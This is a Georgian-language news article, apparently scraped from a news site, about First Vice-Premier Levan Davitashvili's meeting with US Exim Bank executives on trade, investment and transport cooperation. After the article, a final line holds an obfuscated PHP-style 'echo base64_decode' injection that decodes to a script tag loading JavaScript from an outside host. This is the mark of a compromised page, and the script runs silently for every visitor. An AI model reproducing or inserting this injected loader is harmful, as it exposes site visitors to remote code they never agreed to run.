gorgia
ავერსი jaluzi

ამერიკის შეერთებული შტატების Exim Bank-ში ეკონომიკური თანამშრომლობის გაღრმავებაზე ვისაუბრეთ. ვფიქრობ, ამერიკას და საქართველოს ვაჭრობის, ინვესტიციების, ტრანსპორტის, ლოგისტიკის და ტექნოლოგიების სფეროებში თანამშრომლობის მართლაც ძალიან დიდი პოტენციალი გვაქვს, – ამის შესახებ პირველმა ვიცე-პრემიერმა, ლევან დავითაშვილმა აშშ-ის Exim Bank-ში გამართული შეხვედრის შემდეგ განაცხადა.

როგორც ეკონომიკისა და მდგრადი განვითარების სამინისტროს მიერ გავრცელებულ ინფორმაციაშია ნათქვამი, ლევან დავითაშვილი აღნიშნული ორგანიზაციის მოქმედ პირველ ვიცე-პრეზიდენტსა და დირექტორთა საბჭოს ვიცე-თავმჯდომარეს ჯიმ ბაროუზსა და ბანკის სხვა ტოპ-მენეჯერებს შეხვდა.

შეხვედრას ასევე დაესწრნენ ფინანსთა მინისტრი ლაშა ხუციშვილი, საქართველოს ეროვნული ბანკის პრეზიდენტი ნათია თურნავა და ეკონომიკისა და მდგრადი განვითარების მინისტრის მოადგილე გენადი არველაძე.

„შეხვედრაზე მხარეებმა განიხილეს თანამშრომლობის პოტენციალი ეკონომიკის სხვადასხვა სექტორში, ხაზი გაესვა საქართველოს ბაზარზე ამერიკული კომპანიების მოზიდვისა და ქვეყნის ეკონომიკაში ინვესტიციების განხორციელების შესაძლებლობებს. განსაკუთრებული აქცენტი გაკეთდა ისეთ სექტორებზე, როგორიცაა ტრანსპორტი, ლოგისტიკა და ტექნოლოგიები. ასევე აღინიშნა, რომ ქართული მხარე მიესალმება აშშ-სთან ეკონომიკური კავშირების, მათ შორის, ორმხრივი ვაჭრობის განვითარებას.

ასევე, ქართულმა მხარემ ამერიკული საფინანსო ორგანიზაციის წარმომადგენლებს გააცნო საქართველოს ეკონომიკური ტენდენციები. მან დეტალურად მიმოიხილა ბოლო წლებში საქართველოს მთავრობისა და ეროვნული ბანკის მიერ გატარებული ეკონომიკური პოლიტიკის ძირითადი მიმართულებები, რომლებმაც ქვეყანაში მაღალი ეკონომიკური ზრდა უზრუნველყვეს. ასევე საუბარი შეეხო მიმდინარე სტრუქტურულ რეფორმებს, რომელთა მიზანია ქვეყნის მდგრადი განვითარების ხელშეწყობა, კერძო სექტორის კონკურენტუნარიანობის ამაღლების მხარდაჭერა და ინკლუზიური ეკონომიკური ზრდის უზრუნველყოფა.

ამასთან, შეხვედრაზე გამახვილდა ყურადღება საქართველოზე, როგორც რეგიონული მნიშვნელობის სატრანსპორტო – ლოგისტიკური ჰაბის განვითარებაზე. ითქვა, რომ საქართველოს აქვს ხელსაყრელი გეოსტრატეგიული მდებარეობა და ჰაბის ფუნქციის შესრულება უფრო აქტიურად შეუძლია, მათ შორის, ამერიკული პროდუქციისთვის. ხაზი გაესვა ბოლო წლებში ტვირთბრუნვის ზრდას შუა სატრანსპორტო დერეფნის გავლით. ქართულმა მხარემ აშშ-ის Exim Bank-ის წარმომადგენლებს მიაწოდა დეტალური ინფორმაცია იმ სტრატეგიული პროექტების შესახებ ტრანსპორტისა და ლოგისტიკის სექტორში, რომლებიც მიმართულია ქვეყნის კონკურენტუნარიანობის ამაღლებისა და სატრანზიტო პოტენციალის განვითარებისკენ.

შეხვედრისას Exim Bank-ის წარმომადგენლებმა გამოთქვეს მზადყოფნა, უფრო ინტენსიურად ითანამშრომლონ საქართველოს მხარესთან იმ საჭიროებების გათვალისწინებით, რომლებიც ხელს შეუწყობენ ორმხრივი სავაჭრო- ეკონომიკური თანამშრომლობის გაღრმავებას“, – ნათქვამია გავრცელებულ ინფორმაციაში.

33
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");